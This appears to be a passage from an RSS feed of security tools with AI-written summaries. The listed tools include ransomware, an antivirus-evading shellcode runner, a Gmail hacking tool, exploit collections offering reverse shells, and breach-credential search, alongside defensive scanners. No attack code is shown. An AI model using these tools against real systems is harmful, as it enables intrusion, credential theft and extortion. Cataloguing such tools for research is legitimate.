&lt;h4 id="easy-gmail-hacking-in-python"&gt;Easy gmail hacking in python&lt;/h4&gt;
&lt;blockquote&gt;
&lt;p&gt;Я не несу ответственности за ваши действия. Скачивая программное обеспечение из этого репозитория, вы соглашаетесь с &lt;a href="https://github.com/mishakorzik/Gmail-Hack/blob/main/LICENSE"&gt;лицензией&lt;/a&gt;.&lt;/p&gt;</description></item><item><title>go-shellcode</title><link>https://rainmana.github.io/hackyfeed/tools/brimstone-go-shellcode/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/brimstone-go-shellcode/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The go-shellcode tool enables users to execute shellcode directly from memory as a standalone process, aiming to circumvent antivirus detection. Its primary use case involves running custom shellcode for penetration testing or exploitation purposes, leveraging features like shellcode size handling via batch scripts and a recommendation for binary obfuscation using the garble tool. The tool requires manual architecture specification and supports 64-bit shellcode execution while providing instructions for building and compressing the resulting binary.&lt;/p&gt;</description></item><item><title>go-whatsapp</title><link>https://rainmana.github.io/hackyfeed/tools/rhymen-go-whatsapp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rhymen-go-whatsapp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The go-whatsapp package offers a Go interface for interacting with the WhatsApp Web API, enabling developers to integrate WhatsApp functionalities in their applications. Its primary use case is to facilitate the sending and receiving of messages, management of user sessions, and handling various types of media messages through a websocket connection. Notable features include session restoration, customizable message handlers for different message types, and the ability to send contact information in the vCard format; however, the package is not actively maintained and may soon become obsolete due to WhatsApp&amp;rsquo;s evolving architecture.&lt;/p&gt;</description></item><item><title>goblin</title><link>https://rainmana.github.io/hackyfeed/tools/m4b-goblin/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m4b-goblin/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; libgoblin is a versatile Rust library for binary parsing, loading, and analysis, supporting multiple formats including ELF, Mach-O, and PE across both 32-bit and 64-bit architectures. Its notable features include zero-copy parsing, cross-platform capabilities, endian-awareness, and extensive configurability, allowing users to adapt it to various binary analysis tasks while maintaining a lightweight and efficient footprint. The library is designed for use cases ranging from compiler development to binary analysis tools, making it a comprehensive solution for developers working with binary data.&lt;/p&gt;</description></item><item><title>Goby</title><link>https://rainmana.github.io/hackyfeed/tools/gobysec-goby/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gobysec-goby/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Goby is a network security assessment tool designed for efficient vulnerability scanning and comprehensive attack surface analysis of target enterprises. It features over 100,000 rule recognition engines and 200 protocol recognition engines, facilitating identification of various network and software vulnerabilities, along with access to preset account information for more than 1,000 devices. Additionally, Goby supports cross-platform functionality on Windows, MacOS, and Linux, and employs a user-friendly interface built with Electron and Vue.&lt;/p&gt;</description></item><item><title>GobyVuls</title><link>https://rainmana.github.io/hackyfeed/tools/gobysec-gobyvuls/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gobysec-gobyvuls/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GobyVuls is a collection of exploitation scripts specifically designed for vulnerabilities identified by the Goby scanning tool. The primary use case is to facilitate the exploitation of detected vulnerabilities, allowing users to perform actions such as command execution or establishing reverse shells. Notable features include a user-friendly interface for scanning and verification, as well as a collaborative framework for contributing new vulnerabilities and enhancing existing exploitation methods.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="gobyvuls"&gt;GobyVuls&lt;/h1&gt;
&lt;p&gt;&lt;a href="vulnerability_list.md"&gt;Vulnerabilities&lt;/a&gt; of Goby supported with exploitation.&lt;/p&gt;</description></item><item><title>gogo</title><link>https://rainmana.github.io/hackyfeed/tools/chainreactors-gogo/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/chainreactors-gogo/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; gogo is a versatile network scanning tool designed for both active and passive fingerprinting, featuring customizable port configurations and the extraction of key information such as titles and certificates through regex patterns. It supports the integration of Nuclei proof of concepts (POCs) and offers a heuristic scanning mode for improved performance with minimal resource usage, making it highly efficient for vulnerability detection. The tool is entirely written in Go, ensuring compatibility with minimal dependencies across various operating systems, including legacy versions like Windows 2003.&lt;/p&gt;</description></item><item><title>golang-tls</title><link>https://rainmana.github.io/hackyfeed/tools/denji-golang-tls/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/denji-golang-tls/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The golang-tls repository provides tools for generating TLS certificates and creating simple HTTPS/TLS servers and clients using Go. It supports both RSA and ECDSA key generation and facilitates the creation of self-signed certificates. Notable features include configurations for achieving optimal security scores with SSL Labs and the implementation of basic server-client communication over secure connections.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h5 id="generate-private-key-key"&gt;Generate private key (.key)&lt;/h5&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#75715e"&gt;# Key considerations for algorithm &amp;#34;RSA&amp;#34; ≥ 2048-bit&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;openssl genrsa -out server.key &lt;span style="color:#ae81ff"&gt;2048&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#75715e"&gt;# Key considerations for algorithm &amp;#34;ECDSA&amp;#34; (X25519 || ≥ secp384r1)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#75715e"&gt;# https://safecurves.cr.yp.to/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#75715e"&gt;# List ECDSA the supported curves (openssl ecparam -list_curves)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;openssl ecparam -genkey -name secp384r1 -out server.key
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h5 id="generation-of-self-signedx509-public-key-pem-encodings-pemcrt-based-on-the-private-key"&gt;Generation of self-signed(x509) public key (PEM-encodings &lt;code&gt;.pem&lt;/code&gt;|&lt;code&gt;.crt&lt;/code&gt;) based on the private (&lt;code&gt;.key&lt;/code&gt;)&lt;/h5&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;openssl req -new -x509 -sha256 -key server.key -out server.crt -days &lt;span style="color:#ae81ff"&gt;3650&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h4 id="simple-golang-httpstls-server"&gt;Simple Golang HTTPS/TLS Server&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-go" data-lang="go"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f92672"&gt;package&lt;/span&gt; &lt;span style="color:#a6e22e"&gt;main&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f92672"&gt;import&lt;/span&gt; (
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#75715e"&gt;// &amp;#34;fmt&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#75715e"&gt;// &amp;#34;io&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e6db74"&gt;&amp;#34;net/http&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e6db74"&gt;&amp;#34;log&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#66d9ef"&gt;func&lt;/span&gt; &lt;span style="color:#a6e22e"&gt;HelloServer&lt;/span&gt;(&lt;span style="color:#a6e22e"&gt;w&lt;/span&gt; &lt;span style="color:#a6e22e"&gt;http&lt;/span&gt;.&lt;span style="color:#a6e22e"&gt;ResponseWriter&lt;/span&gt;, &lt;span style="color:#a6e22e"&gt;req&lt;/span&gt; &lt;span style="color:#f92672"&gt;*&lt;/span&gt;&lt;span style="color:#a6e22e"&gt;http&lt;/span&gt;.&lt;span style="color:#a6e22e"&gt;Request&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6e22e"&gt;w&lt;/span&gt;.&lt;span style="color:#a6e22e"&gt;Header&lt;/span&gt;().&lt;span style="color:#a6e22e"&gt;Set&lt;/span&gt;(&lt;span style="color:#e6db74"&gt;&amp;#34;Content-Type&amp;#34;&lt;/span&gt;, &lt;span style="color:#e6db74"&gt;&amp;#34;text/plain&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6e22e"&gt;w&lt;/span&gt;.&lt;span style="color:#a6e22e"&gt;Write&lt;/span&gt;([]byte(&lt;span style="color:#e6db74"&gt;&amp;#34;This is an example server.\n&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#75715e"&gt;// fmt.Fprintf(w, &amp;#34;This is an example server.\n&amp;#34;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#75715e"&gt;// io.WriteString(w, &amp;#34;This is an example server.\n&amp;#34;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#66d9ef"&gt;func&lt;/span&gt; &lt;span style="color:#a6e22e"&gt;main&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6e22e"&gt;http&lt;/span&gt;.&lt;span style="color:#a6e22e"&gt;HandleFunc&lt;/span&gt;(&lt;span style="color:#e6db74"&gt;&amp;#34;/hello&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6e22e"&gt;HelloServer&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6e22e"&gt;err&lt;/span&gt; &lt;span style="color:#f92672"&gt;:=&lt;/span&gt; &lt;span style="color:#a6e22e"&gt;http&lt;/span&gt;.&lt;span style="color:#a6e22e"&gt;ListenAndServeTLS&lt;/span&gt;(&lt;span style="color:#e6db74"&gt;&amp;#34;:443&amp;#34;&lt;/span&gt;, &lt;span style="color:#e6db74"&gt;&amp;#34;server.crt&amp;#34;&lt;/span&gt;, &lt;span style="color:#e6db74"&gt;&amp;#34;server.key&amp;#34;&lt;/span&gt;, &lt;span style="color:#66d9ef"&gt;nil&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#66d9ef"&gt;if&lt;/span&gt; &lt;span style="color:#a6e22e"&gt;err&lt;/span&gt; &lt;span style="color:#f92672"&gt;!=&lt;/span&gt; &lt;span style="color:#66d9ef"&gt;nil&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6e22e"&gt;log&lt;/span&gt;.&lt;span style="color:#a6e22e"&gt;Fatal&lt;/span&gt;(&lt;span style="color:#e6db74"&gt;&amp;#34;ListenAndServe: &amp;#34;&lt;/span&gt;, &lt;span style="color:#a6e22e"&gt;err&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Hint: visit, please do not forget to use https begins, otherwise chrome will download a file as follows:&lt;/p&gt;</description></item><item><title>GonnaCry</title><link>https://rainmana.github.io/hackyfeed/tools/tarcisio-marinho-gonnacry/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tarcisio-marinho-gonnacry/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GonnaCry is a Linux-based ransomware designed to encrypt user files using a robust AES-256-CBC encryption scheme, featuring per-file random AES keys and initialization vectors. Its primary use case is to serve as an educational tool for understanding malware, cryptography, and operating systems, with capabilities such as communicating with a server for key management, altering system wallpapers, and terminating database services. Notable features include a built-in decryptor and the use of RSA-2048 for secure key encryption, making it a comprehensive demonstration of ransomware mechanics.&lt;/p&gt;</description></item><item><title>Goohak</title><link>https://rainmana.github.io/hackyfeed/tools/1n3-goohak/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/1n3-goohak/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GooHak is an automated tool designed for launching Google hacking queries against specified target domains to uncover vulnerabilities and facilitate enumeration. Its primary use case is to streamline the process of gathering information through tailored search queries, leveraging Google’s search capabilities. Notable features include straightforward command-line usage and dependencies tailored for Linux environments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="goohak"&gt;GooHak&lt;/h1&gt;
&lt;h2 id="about"&gt;ABOUT:&lt;/h2&gt;
&lt;p&gt;Automatically launch google hacking queries against a target domain to find vulnerabilities and enumerate a target.&lt;/p&gt;</description></item><item><title>goscan</title><link>https://rainmana.github.io/hackyfeed/tools/marco-lancini-goscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/marco-lancini-goscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GoScan is an interactive network scanner client designed to automate and provide abstraction over nmap, facilitating host discovery, port scanning, and service enumeration. It is particularly suitable for use in CTFs, OSCP exams, or professional engagements, capable of maintaining scan state in an SQLite database, allowing for asynchronous results upload even in unstable network conditions. Notable features include service enumeration integration with additional tools such as EyeWitness and Hydra, real-time auto-completion, and support for importing data at various stages of the scanning process.&lt;/p&gt;</description></item><item><title>gosearch</title><link>https://rainmana.github.io/hackyfeed/tools/ibnaleem-gosearch/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ibnaleem-gosearch/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GoSearch is an OSINT tool designed to automate the process of searching for online profiles associated with specific usernames, utilizing concurrency for efficiency. It integrates searches across multiple extensive databases, including 900,000 leaked credentials from HudsonRock and over 18 billion from BreachDirectory, enhancing its capability to detect compromised accounts. Notable features include the ability to filter results for accuracy with the &lt;code&gt;--no-false-positives&lt;/code&gt; flag and the option to crack found password hashes using Weakpass, significantly boosting the tool&amp;rsquo;s effectiveness in cybersecurity investigations.&lt;/p&gt;</description></item><item><title>gosec</title><link>https://rainmana.github.io/hackyfeed/tools/securego-gosec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/securego-gosec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; gosec is a security analysis tool designed to inspect Go source code for potential security vulnerabilities by scanning the Abstract Syntax Tree (AST) and Static Single Assignment (SSA) representation. It utilizes pattern-based rules, SSA-based analyzers, and taint analysis to identify common issues like SQL injection and XSS. Notable features include customizable rule selection, various output formats, and integration as a GitHub Action for continuous security monitoring.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="gosec---go-security-checker"&gt;gosec - Go Security Checker&lt;/h1&gt;
&lt;p&gt;Inspects source code for security problems by scanning the Go AST and SSA code representation.&lt;/p&gt;</description></item><item><title>gotestwaf</title><link>https://rainmana.github.io/hackyfeed/tools/wallarm-gotestwaf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wallarm-gotestwaf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GoTestWAF is a versatile tool designed for simulating API and web application attacks, supporting a multitude of protocols like REST, GraphQL, and gRPC, among others. It evaluates the effectiveness of security solutions such as Web Application Firewalls and API gateways by generating malicious HTTP requests with encoded payloads, allowing for comprehensive security testing and reporting of vulnerabilities. Notable features include customizable payloads, diverse encoding options, and the ability to specify request placeholders for precise attack simulations.&lt;/p&gt;</description></item><item><title>GpgFrontend</title><link>https://rainmana.github.io/hackyfeed/tools/saturneric-gpgfrontend/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/saturneric-gpgfrontend/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GpgFrontend is a modern encryption tool that leverages GnuPG to facilitate easy and secure encryption and signing of texts and files across multiple platforms, including Windows, macOS, and Linux. Key features include a portable solution that can be run from a USB drive, flexible management of key databases, and a strong focus on user privacy through various safety measures. The tool also supports extensive module development, allowing for customizable user experiences and features.&lt;/p&gt;</description></item><item><title>gpt4free</title><link>https://rainmana.github.io/hackyfeed/tools/xtekky-gpt4free/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/xtekky-gpt4free/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GPT4Free (g4f) is a robust tool designed to streamline interactions with various accessible Large Language Models (LLMs) and media-generation models by providing a unified interface across multiple providers. It features local GUI support, OpenAI-compatible REST APIs, and clients in both Python and JavaScript, enhancing flexibility and ease of use for developers. Notably, it is community-driven, allowing customization and contribution to improve the platform further.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="gpt4free-g4f"&gt;GPT4Free (g4f)&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://pypi.org/project/g4f"&gt;&lt;img src="https://img.shields.io/pypi/v/g4f" alt="PyPI"&gt;&lt;/a&gt; &lt;a href="https://hub.docker.com/r/hlohaus789/g4f"&gt;&lt;img src="https://img.shields.io/badge/docker-hlohaus789%2Fg4f-blue" alt="Docker Hub"&gt;&lt;/a&gt; &lt;a href="https://www.gnu.org/licenses/gpl-3.0.txt"&gt;&lt;img src="https://img.shields.io/badge/License-GPLv3-red.svg" alt="License: GPL v3"&gt;&lt;/a&gt; &lt;a href="https://pepy.tech/projects/g4f"&gt;&lt;img src="https://static.pepy.tech/personalized-badge/g4f?period=total&amp;amp;units=INTERNATIONAL_SYSTEM&amp;amp;left_color=BLACK&amp;amp;right_color=GREEN&amp;amp;left_text=downloads" alt="PyPI Downloads"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>grapefruit</title><link>https://rainmana.github.io/hackyfeed/tools/chichou-grapefruit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/chichou-grapefruit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Grapefruit is an open-source mobile security testing suite designed for runtime mobile application instrumentation, supporting both iOS and Android platforms through a web-based interface powered by Frida. It allows users to inspect, hook, and modify mobile apps with features including method hooking, cryptographic API interception, filesystem and SQLite database inspection, memory scanning, and real-time log monitoring. Additionally, it provides support for various frameworks like Flutter and React Native, as well as advanced analysis and decompilation capabilities for a comprehensive security assessment.&lt;/p&gt;</description></item><item><title>greenmask</title><link>https://rainmana.github.io/hackyfeed/tools/greenmaskio-greenmask/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/greenmaskio-greenmask/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Greenmask is an open-source utility designed for logical database dumping, anonymization, and synthetic data generation, primarily targeting PostgreSQL with ongoing support for MySQL. It enables users to create smaller, referentially intact development databases while offering features such as deterministic transformations, dynamic parameters, and storage support for S3-compatible systems, ensuring flexibility and data integrity. Ideal for sanitizing sensitive data, backing up and restoring databases, and streamlining local development processes, Greenmask operates statelessly and produces outputs compatible with standard database tools.&lt;/p&gt;</description></item><item><title>GTFOBins.github.io</title><link>https://rainmana.github.io/hackyfeed/tools/gtfobins-gtfobins.github.io/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gtfobins-gtfobins.github.io/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; GTFOBins is a curated repository that catalogs Unix-like executables capable of circumventing local security restrictions in improperly configured systems. Its primary use case is to aid security professionals and penetration testers in identifying and exploiting misconfigurations. Notable features include a comprehensive database of binaries and detailed usage instructions for different scenarios.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="gtfobins"&gt;GTFOBins&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/GTFOBins/GTFOBins.github.io/actions?query=workflow:CI"&gt;&lt;img src="https://github.com/GTFOBins/GTFOBins.github.io/actions/workflows/ci.yml/badge.svg" alt="CI status"&gt;&lt;/a&gt;
&lt;a href="https://github.com/GTFOBins/GTFOBins.github.io/actions?query=workflow:Pages"&gt;&lt;img src="https://github.com/GTFOBins/GTFOBins.github.io/actions/workflows/pages.yml/badge.svg" alt="CI status"&gt;&lt;/a&gt;
&lt;a href="https://github.com/sponsors/GTFOBins"&gt;&lt;img src="https://img.shields.io/static/v1?label=Sponsor&amp;amp;message=%E2%9D%A4&amp;amp;color=%23db61a2" alt="Sponsor"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://gtfobins.org"&gt;&lt;img align="right" src="assets/logo.png" style="width: 100px" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;GTFOBins is a curated list of Unix-like executables that can be used to bypass local security restrictions in misconfigured systems.&lt;/p&gt;</description></item><item><title>guardian-cli</title><link>https://rainmana.github.io/hackyfeed/tools/zakirkun-guardian-cli/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zakirkun-guardian-cli/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Guardian is an AI-powered penetration testing automation platform designed for enterprise environments, integrating multiple AI providers with extensive security tools to perform intelligent and adaptive security assessments. It features a multi-agent architecture for strategic decision-making, 19 integrated security tools for thorough testing, and enhanced evidence capture for complete traceability of findings. Users must ensure authorized access before conducting tests, adhering to legal and ethical guidelines.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
&lt;img src="docs/logo.svg" alt="Guardian Logo" width="200" /&gt;
&lt;h1 id="-guardian"&gt;🔐 Guardian&lt;/h1&gt;
&lt;h3 id="ai-powered-penetration-testing-automation-platform"&gt;AI-Powered Penetration Testing Automation Platform&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://opensource.org/licenses/MIT"&gt;&lt;img src="https://img.shields.io/badge/License-MIT-yellow.svg" alt="License: MIT"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/"&gt;&lt;img src="https://img.shields.io/badge/python-3.11+-blue.svg" alt="Python 3.11+"&gt;&lt;/a&gt;
&lt;a href="https://github.com/psf/black"&gt;&lt;img src="https://img.shields.io/badge/code%20style-black-000000.svg" alt="Code style: black"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>h-encore</title><link>https://rainmana.github.io/hackyfeed/tools/theofficialflow-h-encore/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/theofficialflow-h-encore/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; h-encore is a jailbreak tool for the PS Vita that enables kernel and user-mode modifications on firmware versions 3.65, 3.67, and 3.68. Its primary use case is to allow users to install plugins, run homebrew applications, and customize their device&amp;rsquo;s performance. Notable features include the ability to auto-exit the bootstrap menu, personalize savedata to remove trophy warnings, and a streamlined kernel ROP chain for enhanced stability and compatibility.&lt;/p&gt;</description></item><item><title>h2csmuggler</title><link>https://rainmana.github.io/hackyfeed/tools/bishopfox-h2csmuggler/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bishopfox-h2csmuggler/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; h2cSmuggler is a specialized tool that facilitates the smuggling of HTTP traffic past insecure proxy configurations by leveraging HTTP/2 cleartext (h2c) communications with compatible back-end servers. Its primary use case involves testing web servers for vulnerabilities related to improperly configured &lt;code&gt;proxy_pass&lt;/code&gt; directives that could allow attackers to bypass access controls and proxy rules. Notable features include the ability to scan multiple endpoints concurrently, integration with popular security tools like Burp Suite, and a test environment for demonstration and experimentation with h2c smuggling techniques.&lt;/p&gt;</description></item><item><title>h8mail</title><link>https://rainmana.github.io/hackyfeed/tools/khast3x-h8mail/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/khast3x-h8mail/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; h8mail is an email open-source intelligence (OSINT) and breach hunting tool designed to search for emails across various breach and reconnaissance services, including local database breaches. It features advanced capabilities such as regex-based email pattern matching, support for multiprocessed local searches, and integration with premium APIs for enhanced data retrieval. Additionally, it allows bulk file processing and the output of results in CSV or JSON format, making it highly versatile for cybersecurity professionals.&lt;/p&gt;</description></item><item><title>HaboMalHunter</title><link>https://rainmana.github.io/hackyfeed/tools/tencent-habomalhunter/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tencent-habomalhunter/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; HaboMalHunter is an automated malware analysis tool specifically designed for Linux ELF files, facilitating both static and dynamic analysis to aid security analysts. It efficiently extracts crucial features such as process behavior, file I/O, and network interactions, generating comprehensive reports on malicious activities. Notable features include detailed static analysis of file dependencies and strings, as well as dynamic tracking of execution timestamps, API calls, and syscall sequences.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
